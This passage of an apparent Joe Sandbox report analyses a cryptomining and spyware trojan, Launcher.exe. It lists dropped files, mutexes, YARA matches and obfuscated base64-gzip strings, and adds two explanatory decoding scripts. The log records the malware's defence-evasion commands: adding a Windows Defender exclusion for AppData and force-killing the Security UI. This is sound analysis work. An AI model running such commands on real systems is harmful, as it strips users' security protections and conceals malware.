                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0040477229_2_00404772
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043177529_2_00431775
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043B71029_2_0043B710
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00431FCA29_2_00431FCA
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_004367DA29_2_004367DA
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00435F8829_2_00435F88
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0041DF8F29_2_0041DF8F
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0041EF9E29_2_0041EF9E
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0041E7AF29_2_0041E7AF
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043F7B029_2_0043F7B0
                      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe 4DA98D39D64E332399A1B2EE3CBE4F07436A8B6FF9F35D41CCF0FF147F54D24C
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: String function: 0041ACC0 appears 85 times
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: String function: 0021607C appears 44 times
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: String function: 0021AE24 appears 34 times
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: String function: 0040B1D0 appears 47 times
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: String function: 0020DE10 appears 96 times
                      Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 472 -p 6972 -ip 6972
                      Source: Launcher.exe, 00000000.00000000.1242014140.0000000003E4D000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameaethersuite.exe8 vs Launcher.exe
                      Source: Launcher.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: dump.pcap, type: PCAP | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                      Source: 64.0.RtkAudUService64a.exe.7ff728030000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                      Source: 64.0.RtkAudUService64a.exe.7ff728030000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                      Source: 64.0.RtkAudUService64a.exe.7ff728030000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                      Source: 00000040.00000000.1979728835.00007FF7283B4000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                      Source: xzuucncwbxucqic.exe.0.drStatic PE information: Section: .bss ZLIB complexity 1.0003259892086331
                      Source: xzuucncwbxucqic.exe.0.drStatic PE information: Section: .bss ZLIB complexity 1.0003259892086331
                      Source: wxymrnibweqciwn.exe.0.drStatic PE information: Section: ZLIB complexity 0.9992485687022901
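The ZLIB complexity figures above are a compressibility ratio: the section's raw bytes are zlib-compressed and the compressed size is divided by the raw size (our reading of the metric; the report does not spell out the formula). A value at or slightly above 1.0 therefore means zlib cannot shrink the section at all, which is what packed or encrypted payloads look like. Two details matter for triage: a `.bss` section normally has no raw data on disk, so a `.bss` carrying incompressible bytes is itself a packer tell, and the third entry has an empty section name, i.e. a nameless section. The script below is an added example, not part of the Joe Sandbox report or of the analysed sample; it computes that ratio over constructed byte strings (a repetitive code-like stub, and a SHA-256 hash chain standing in for packed data) and flags sections above a threshold we chose for the example.

```python
import hashlib
import zlib


def zlib_complexity(data: bytes) -> float:
    """Compressed size divided by raw size; our reading of the report's ZLIB complexity metric.
    Values near 1.0 (or slightly above, because of zlib framing overhead) mean incompressible data."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def pseudo_random_bytes(n: int, seed: bytes = b"seed") -> bytes:
    """Deterministic, incompressible filler built from a SHA-256 hash chain, so the example
    runs offline and reproducibly without reading a real packed section."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def classify_section(name: str, data: bytes, threshold: float = 0.98) -> dict:
    """Flag a section whose raw bytes zlib cannot shrink below `threshold` of their size.
    The threshold is our choice for this example, not a value taken from Joe Sandbox."""
    c = zlib_complexity(data)
    return {
        "section": name or "<nameless>",   # an empty name is what the report prints as "Section: "
        "complexity": round(c, 4),
        "incompressible": c >= threshold,
    }


# Constructed sample sections (not bytes taken from the analysed files):
SAMPLE_SECTIONS = {
    ".text": b"\x55\x8b\xec\x83\xec\x10" * 400,   # repetitive x86 prologue bytes, compresses well
    ".bss": pseudo_random_bytes(4096),             # stands in for the packed .bss reported above
    "": pseudo_random_bytes(2048, b"other"),       # nameless section, like wxymrnibweqciwn.exe's
}


def scan_sections(sections: dict) -> list:
    """Classify every section and return the result dicts in input order."""
    return [classify_section(name, data) for name, data in sections.items()]


if __name__ == "__main__":
    for r in scan_sections(SAMPLE_SECTIONS):
        print(f'{r["section"]:<12} complexity={r["complexity"]:.4f} incompressible={r["incompressible"]}')
```

On a real file the same function would be fed each section's raw data (for example via `pefile`'s `section.get_data()`); the point of the example is only the metric and the threshold logic, which is why the input is constructed.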
                      Source: qzemwxiuzucyxcx.exe.0.dr, -Module-.csBase64 encoded string: 'H4sIAAAAAAAEAAuuLC5JzfXMS8svyk0t0kutSAUAxbwl3BIAAAA=', 'H4sIAAAAAAAEAEtMLsksS40vKMovSQUy8/Pii1OLyjKTU/VSK1IBBabFWx0AAAA=', 'H4sIAAAAAAAEAEuuTEot0i1OLsosKMnMS9dNrUhNLi3JL9IDMgAdHJTfHAAAAA==', 'H4sIAAAAAAAEACsoyixLLEnVTc7JL03RLSjKr6jUS61IBQDHDABaFwAAAA==', 'H4sIAAAAAAAEACvJTIrPzS/NK0ktAtJ5mSX5RXqpFakA87J1NBcAAAA=', 'H4sIAAAAAAAEAMvKT03Kr0jOzyspys/RS61IBQBs4Ht3EQAAAA==', 'H4sIAAAAAAAEACvLLU8sSi1OLSrLTE7VS61IBQC0nYUtEQAAAA==', 'H4sIAAAAAAAEANN1zs/NTcxLUVByTy3RDc/N9E/KSk0uUQjPzDM2ig/ILypxzs/LA4rkFykBAHOqT+4sAAAA', 'H4sIAAAAAAAEADN0Ks9zDy03Ty8tyAvOdg83zTAPyHZPyQ81Lk11rzBLcQkFAI1X670iAAAA', 'H4sIAAAAAAAEADP2yQjxCy808SvKrzDPqvBNzTOziDDJ9w40sSwPN3fJdfYGAIRxX7MiAAAA', 'H4sIAAAAAAAEADOoMHGytDAwcXE1N0pytExKcjM1cTY0MUtMtDBPNTa0tHA2NjQ2ME80MwYAr82ugSoAAAA=', 'H4sIAAAAAAAEAAXB0QqDIBQA0G/Ke+u2x7FEyAqctZnv1YYQt2ws/PrOwVKm582m36ZmYbPFvfrAstrlxxdvrh1oHVXhz/aLSGsYqTFTh0zjlMER/qRAq0pzbuCB5IdoOFqX7oKOHlIpLqZfBrNfAAAA', 'H4sIAAAAAAAEAHN3cjXx83dx8gs3ijBydfEMNDczNg7xcg339A8NcDJxNzUPdPZ2jgr0DYt08zB1j4g0NQ91DQsLAwBrow6qOAAAAA==', 'H4sIAAAAAAAEAMspSTYsNDGpKjGpqjQ2y8gzKMgyyzWtSik0K8szys4qSswyzqsySSkwzSkBAKEKrqgrAAAA', 'H4sIAAAAAAAEAPNJSS8KSTZzMUzLKC+0dPMKyvJ1jcxIzHMrMq/wcw5OTAwCADl1sVwiAAAA', 'H4sIAAAAAAAEAAXBiQ3DIAwAwJVoIXU8TmSDUAErfG5g+t5dzO1VcdMEF8Tuj+eV/W1kmfEr5OjRKGlJL3kb02QEDgd0l1DOSNdTkob2xgwMMCx+2av4OElPnMXmo3bFuu4/z8o/PmcAAAA=', 'H4sIAAAAAAAEAHPxNis08UpPTLFMt/AL8fUuDfdKzC8LcnKuKPOO8I2sKkkEABqEemIiAAAA', 'H4sIAAAAAAAEAAsJdA3x8PEq9ilPCvLwKTVPTa1yN3atTMrKDS40LXNO8yoBAAvBh9MiAAAA', 'H4sIAAAAAAAEAEvOL87NLzY0rsyryE5NTMszKcwyTy5JTaxIM6g0Mi4oTM4xyE02syw3MygxygIAB8r3yi0AAAA=', 'H4sIAAAAAAAEAEvKLEnOz8xLTizOsCosTK2sqDQpTDRLy05Pz8spKjBNL882Ls/KzjZIzy4stijNMzGpyLNMzQYAmnXw3zYAAAA=', 'H4sIAAAAAAAEACssTK2sqDQpTDRLy05Pz8spKjBNL882Ls/KzjZIzy4stijNMzGpyLNMzQYAaBdagioAAAA=', 'H4sIAAAAAAAEACvKz8vMszJxsrQwMHFxNTdKcrRMSnIzNXE2NDFLTLQwTzU2tLRwNjY0NjBPNDMGABX5YPEuAAAA', 
'H4sIAAAAAAAEAAsNdPJPD800zc9xLSkzKMmODPfML/T39kkKzDNzd3TJMPJIzwsqSYtPNs52SjRJ8QUAVAnaMDAAAAA=', 'H4sIAAAAAAAEACtJLSpKNMxNNc5KTy9NTq00Kk0zL7UwLkq3zM0pqEipLM3JMM+1KEm3SM4xAgCEXmR5LAAAAA==', 'H4sIAAAAAAAEAHNxL8ssdSyJKM/2y8iP8iowqgpLLQ9LyzB1KfDNKk0ODPPONUzxMU0uziwuAwCYyGRqLAAAAA==', 'H4sIAAAAAAAEADN0Ks9zDy03Ty8tyAvOdg83zTAPyHZPyQ81Lk11rzBLcQkFAI1X670iAAAA', 'H4sIAAAAAAAEADP2yQjxCy808SvKrzDPqvBNzTOziDDJ9w40sSwPN3fJdfYGAIRxX7MiAAAA', 'H4sIAAAAAAAEADOoMHGytDAwcXE1N0pytExKcjM1cTY0MUtMtDBPNTa0tHA2NjQ2ME80MwYAr82ugSoAAAA=', 'H4sIAAAAAAAEAAXB0QqDIBQA0G/Ke+u2x7FEyAqctZnv1YYQt2ws/PrOwVKm582m36ZmYbPFvfrAstrlxxdvrh1oHVXhz/aLSGsYqTFTh0zjlMER/qRAq0pzbuCB5IdoOFqX7oKOHlIpLqZfBrNfAAAA', 'H4sIAAAAAAAEAHN3cjXx83dx8gs3ijBydfEMNDczNg7xcg339A8NcDJxNzUPdPZ2jgr0DYt08zB1j4g0NQ91DQsLAwBrow6qOAAAAA==', 'H4sIAAAAAAAEAMspSTYsNDGpKjGpqjQ2y8gzKMgyyzWtSik0K8szys4qSswyzqsySSkwzSkBAKEKrqgrAAAA', 'H4sIAAAAAAAEAPNJSS8KSTZzMUzLKC+0dPMKyvJ1jcxIzHMrMq/wcw5OTAwCADl1sVwiAAAA', 'H4sIAAAAAAAEAAXBiQ3DIAwAwJVoIXU8TmSDUAErfG5g+t5dzO1VcdMEF8Tuj+eV/W1kmfEr5OjRKGlJL3kb02QEDgd0l1DOSNdTkob2xgwMMCx+2av4OElPnMXmo3bFuu4/z8o/PmcAAAA=', 'H4sIAAAAAAAEAHPxNis08UpPTLFMt/AL8fUuDfdKzC8
                      Source: MicrosoftEdgeUpdate.exe.31.dr, -Module-.csBase64 encoded string: 'H4sIAAAAAAAEAAuuLC5JzfXMS8svyk0t0kutSAUAxbwl3BIAAAA=', 'H4sIAAAAAAAEAEtMLsksS40vKMovSQUy8/Pii1OLyjKTU/VSK1IBBabFWx0AAAA=', 'H4sIAAAAAAAEAEuuTEot0i1OLsosKMnMS9dNrUhNLi3JL9IDMgAdHJTfHAAAAA==', 'H4sIAAAAAAAEACsoyixLLEnVTc7JL03RLSjKr6jUS61IBQDHDABaFwAAAA==', 'H4sIAAAAAAAEACvJTIrPzS/NK0ktAtJ5mSX5RXqpFakA87J1NBcAAAA=', 'H4sIAAAAAAAEAMvKT03Kr0jOzyspys/RS61IBQBs4Ht3EQAAAA==', 'H4sIAAAAAAAEACvLLU8sSi1OLSrLTE7VS61IBQC0nYUtEQAAAA==', 'H4sIAAAAAAAEANN1zs/NTcxLUVByTy3RDc/N9E/KSk0uUQjPzDM2ig/ILypxzs/LA4rkFykBAHOqT+4sAAAA', 'H4sIAAAAAAAEADN0Ks9zDy03Ty8tyAvOdg83zTAPyHZPyQ81Lk11rzBLcQkFAI1X670iAAAA', 'H4sIAAAAAAAEADP2yQjxCy808SvKrzDPqvBNzTOziDDJ9w40sSwPN3fJdfYGAIRxX7MiAAAA', 'H4sIAAAAAAAEADOoMHGytDAwcXE1N0pytExKcjM1cTY0MUtMtDBPNTa0tHA2NjQ2ME80MwYAr82ugSoAAAA=', 'H4sIAAAAAAAEAAXB0QqDIBQA0G/Ke+u2x7FEyAqctZnv1YYQt2ws/PrOwVKm582m36ZmYbPFvfrAstrlxxdvrh1oHVXhz/aLSGsYqTFTh0zjlMER/qRAq0pzbuCB5IdoOFqX7oKOHlIpLqZfBrNfAAAA', 'H4sIAAAAAAAEAHN3cjXx83dx8gs3ijBydfEMNDczNg7xcg339A8NcDJxNzUPdPZ2jgr0DYt08zB1j4g0NQ91DQsLAwBrow6qOAAAAA==', 'H4sIAAAAAAAEAMspSTYsNDGpKjGpqjQ2y8gzKMgyyzWtSik0K8szys4qSswyzqsySSkwzSkBAKEKrqgrAAAA', 'H4sIAAAAAAAEAPNJSS8KSTZzMUzLKC+0dPMKyvJ1jcxIzHMrMq/wcw5OTAwCADl1sVwiAAAA', 'H4sIAAAAAAAEAAXBiQ3DIAwAwJVoIXU8TmSDUAErfG5g+t5dzO1VcdMEF8Tuj+eV/W1kmfEr5OjRKGlJL3kb02QEDgd0l1DOSNdTkob2xgwMMCx+2av4OElPnMXmo3bFuu4/z8o/PmcAAAA=', 'H4sIAAAAAAAEAHPxNis08UpPTLFMt/AL8fUuDfdKzC8LcnKuKPOO8I2sKkkEABqEemIiAAAA', 'H4sIAAAAAAAEAAsJdA3x8PEq9ilPCvLwKTVPTa1yN3atTMrKDS40LXNO8yoBAAvBh9MiAAAA', 'H4sIAAAAAAAEAEvOL87NLzY0rsyryE5NTMszKcwyTy5JTaxIM6g0Mi4oTM4xyE02syw3MygxygIAB8r3yi0AAAA=', 'H4sIAAAAAAAEAEvKLEnOz8xLTizOsCosTK2sqDQpTDRLy05Pz8spKjBNL882Ls/KzjZIzy4stijNMzGpyLNMzQYAmnXw3zYAAAA=', 'H4sIAAAAAAAEACssTK2sqDQpTDRLy05Pz8spKjBNL882Ls/KzjZIzy4stijNMzGpyLNMzQYAaBdagioAAAA=', 'H4sIAAAAAAAEACvKz8vMszJxsrQwMHFxNTdKcrRMSnIzNXE2NDFLTLQwTzU2tLRwNjY0NjBPNDMGABX5YPEuAAAA', 
'H4sIAAAAAAAEAAsNdPJPD800zc9xLSkzKMmODPfML/T39kkKzDNzd3TJMPJIzwsqSYtPNs52SjRJ8QUAVAnaMDAAAAA=', 'H4sIAAAAAAAEACtJLSpKNMxNNc5KTy9NTq00Kk0zL7UwLkq3zM0pqEipLM3JMM+1KEm3SM4xAgCEXmR5LAAAAA==', 'H4sIAAAAAAAEAHNxL8ssdSyJKM/2y8iP8iowqgpLLQ9LyzB1KfDNKk0ODPPONUzxMU0uziwuAwCYyGRqLAAAAA==', 'H4sIAAAAAAAEADN0Ks9zDy03Ty8tyAvOdg83zTAPyHZPyQ81Lk11rzBLcQkFAI1X670iAAAA', 'H4sIAAAAAAAEADP2yQjxCy808SvKrzDPqvBNzTOziDDJ9w40sSwPN3fJdfYGAIRxX7MiAAAA', 'H4sIAAAAAAAEADOoMHGytDAwcXE1N0pytExKcjM1cTY0MUtMtDBPNTa0tHA2NjQ2ME80MwYAr82ugSoAAAA=', 'H4sIAAAAAAAEAAXB0QqDIBQA0G/Ke+u2x7FEyAqctZnv1YYQt2ws/PrOwVKm582m36ZmYbPFvfrAstrlxxdvrh1oHVXhz/aLSGsYqTFTh0zjlMER/qRAq0pzbuCB5IdoOFqX7oKOHlIpLqZfBrNfAAAA', 'H4sIAAAAAAAEAHN3cjXx83dx8gs3ijBydfEMNDczNg7xcg339A8NcDJxNzUPdPZ2jgr0DYt08zB1j4g0NQ91DQsLAwBrow6qOAAAAA==', 'H4sIAAAAAAAEAMspSTYsNDGpKjGpqjQ2y8gzKMgyyzWtSik0K8szys4qSswyzqsySSkwzSkBAKEKrqgrAAAA', 'H4sIAAAAAAAEAPNJSS8KSTZzMUzLKC+0dPMKyvJ1jcxIzHMrMq/wcw5OTAwCADl1sVwiAAAA', 'H4sIAAAAAAAEAAXBiQ3DIAwAwJVoIXU8TmSDUAErfG5g+t5dzO1VcdMEF8Tuj+eV/W1kmfEr5OjRKGlJL3kb02QEDgd0l1DOSNdTkob2xgwMMCx+2av4OElPnMXmo3bFuu4/z8o/PmcAAAA=', 'H4sIAAAAAAAEAHPxNis08UpPTLFMt/AL8fUuDfdKzC8
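Every quoted string above begins with `H4sI`, which is the base64 encoding of the bytes 1f 8b 08: the gzip magic followed by the deflate method byte. So these are not plain base64 strings but base64-wrapped gzip members, and a straight base64 decode yields binary rather than text. The script below is an added example, not part of the Joe Sandbox report or of the sample; it pulls such blobs out of a report line (a constructed excerpt of the entry above, trimmed to its first three blobs plus one we truncated on purpose, is embedded as sample input) and gunzips each one, returning `None` instead of raising for anything that is not a complete, valid gzip member. The first blob decodes to `SystemInformer.exe`, the executable name of the System Informer process viewer; the remaining ones are left for the reader to decode with the same function.

```python
import base64
import binascii
import gzip
import re
import zlib

# Constructed sample input: an excerpt of the "Base64 encoded string" entry above, trimmed to
# its first three blobs, plus a fourth blob truncated on purpose to exercise the failure path.
SAMPLE_REPORT_LINE = (
    "Source: qzemwxiuzucyxcx.exe.0.dr, -Module-.cs Base64 encoded string: "
    "'H4sIAAAAAAAEAAuuLC5JzfXMS8svyk0t0kutSAUAxbwl3BIAAAA=', "
    "'H4sIAAAAAAAEAEtMLsksS40vKMovSQUy8/Pii1OLyjKTU/VSK1IBBabFWx0AAAA=', "
    "'H4sIAAAAAAAEAEuuTEot0i1OLsosKMnMS9dNrUhNLi3JL9IDMgAdHJTfHAAAAA==', "
    "'H4sIAAAAAAAEAEuuTEot0i1OLsosKMnMS9dNrUhNLi3JL9IDMgAdHJTf'"
)

# 'H4sI' is the base64 encoding of 1f 8b 08: gzip ID1, ID2 and the deflate method byte.
BLOB_RE = re.compile(r"'(H4sI[A-Za-z0-9+/=]+)'")


def extract_b64_blobs(text: str) -> list:
    """Return every single-quoted blob in a report line that starts with the gzip magic."""
    return BLOB_RE.findall(text)


def decode_gzip_b64(blob: str):
    """Base64-decode one blob and gunzip it. Returns the text, or None when the blob is not a
    complete, valid gzip member (bad base64, wrong magic, truncated stream, CRC mismatch)
    or the payload is not UTF-8."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw[:3] != b"\x1f\x8b\x08":
        return None
    try:
        return gzip.decompress(raw).decode("utf-8")
    except (OSError, EOFError, zlib.error, UnicodeDecodeError):
        return None


def decode_all(blobs: list) -> list:
    """Pair each blob with its decoded text (None where decoding failed)."""
    return [(b, decode_gzip_b64(b)) for b in blobs]


if __name__ == "__main__":
    for blob, text in decode_all(extract_b64_blobs(SAMPLE_REPORT_LINE)):
        print(f"{blob[:24]}...  ->  {text!r}")
```

`gzip.decompress` verifies the CRC32 and length trailer, so a blob that decodes "successfully" here is a complete member as the sample's own code would have produced it; a `None` for a blob copied from the report usually means the line was cut off, as the final entry in each of the two report lines above is.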
Source: classification engine | Classification label: mal100.troj.spyw.evad.mine.winEXE@98/41@3/7
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_00442800 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW
Source: C:\Users\user\Desktop\Launcher.exe | File created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2136:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3048:120:WilError_03
Source: C:\Windows\System32\WerFault.exe | Mutant created: \BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4936:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1320:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2104:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4404:120:WilError_03
Source: C:\Windows\SysWOW64\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-3c38a179-f6bc-5041a1-d616db5b5627}
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Mutant created: \Sessions\1\BaseNamedObjects\GlobalSyncObj999
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2956:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Mutant created: \Sessions\1\BaseNamedObjects\1WIN
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2544:120:WilError_03
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6972
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:436:120:WilError_03
Source: C:\Users\user\Desktop\Launcher.exe | File created: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe
Source: Launcher.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SecHealthUI.exe")
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\svchost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Launcher.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Launcher.exe | File read: C:\Users\user\Desktop\Launcher.exe
Source: unknown | Process created: C:\Users\user\Desktop\Launcher.exe "C:\Users\user\Desktop\Launcher.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown | Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "net session"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net session
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exe
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
